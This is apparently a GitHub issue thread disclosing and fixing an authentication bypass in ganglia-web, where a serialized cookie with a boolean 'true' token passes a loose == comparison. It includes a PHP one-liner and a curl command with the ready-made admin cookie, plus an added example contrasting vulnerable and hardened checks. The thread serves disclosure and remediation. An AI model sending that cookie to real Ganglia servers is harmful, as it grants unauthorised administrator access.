[Security] auth bypass #267
Comments
Thanks for reporting. We'll look into fixing this shortly cc/ @alexdean

phew. been a while since i was in this code. sounds like strict equality checking would resolve the problem? if($this->getAuthToken($data['user']) === $data['token']) {

Yes. But I strongly recommend replacing unserialize() with json_decode().

Some more Ganglia security info:

Is there an ETA for a fix?

I think the fix I mentioned above will be sufficient, but I don't have a dev environment set up to confirm with. I don't think it's likely I'll have time to set one up in the near future.

Per d0znpp's suggestion I will be changing serialization to use json_encode/decode.

I will try to get a release published by Friday 10/2/2015

FreeBSD port updated.

It's easy to bypass auth by using boolean serialization like this:
$ php -r "echo urlencode(serialize(array('user'=>'admin', 'group'=>'admin', 'token'=>true)));"
Vulnerable code listed below:
ganglia-web/lib/GangliaAuth.php
Lines 34 to 46 in 4e98ea6
// Found by d90.andrew
// Exploit: curl -H 'Cookie: a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22group%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22token%22%3Bb%3A1%3B%7D' http://ganglia.local/ganglia/
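
The loose versus strict comparison discussed in this thread, shown as an added PHP example that is not the project's code. `token_for()`, `SECRET` and the two check functions are hypothetical stand-ins; only the `user`/`group`/`token` cookie keys come from the report.

```php
<?php
// Added illustration; not the code from GangliaAuth.php.
// SECRET and token_for() are hypothetical stand-ins for the project's token derivation.
const SECRET = 'constructed-example-secret';

function token_for(string $user): string {
    return hash_hmac('sha256', $user, SECRET);
}

// Before: unserialize() preserves PHP types, and == converts a string operand
// to bool when the other operand is a bool, so a boolean true token compares
// equal to any non-empty expected token.
function check_loose(string $cookie): bool {
    $data = unserialize($cookie);
    return is_array($data)
        && is_string($data['user'] ?? null)
        && isset($data['token'])
        && token_for($data['user']) == $data['token'];
}

// After: JSON cannot carry PHP objects, but it can still carry booleans, so
// the type checks and the strict, constant-time comparison do the real work.
function check_strict(string $cookie): bool {
    $data = json_decode($cookie, true);
    if (!is_array($data)) {
        return false;
    }
    $user  = $data['user']  ?? null;
    $token = $data['token'] ?? null;
    if (!is_string($user) || !is_string($token)) {
        return false;
    }
    return hash_equals(token_for($user), $token);
}

// Constructed inputs: the boolean-token array from the report in both
// encodings, plus one cookie carrying the token the server would issue.
$fields      = ['user' => 'admin', 'group' => 'admin'];
$forged_ser  = serialize($fields + ['token' => true]);
$forged_json = json_encode($fields + ['token' => true]);
$valid_json  = json_encode($fields + ['token' => token_for('admin')]);

var_dump(check_loose($forged_ser));   // boolean token against the == check
var_dump(check_strict($forged_json)); // boolean token against the hardened check
var_dump(check_strict($valid_json));  // genuine token against the hardened check
```

Switching to `json_decode()` without the `is_string()` checks and a strict comparison would leave the same bypass open, because `{"token": true}` decodes to a PHP boolean as well.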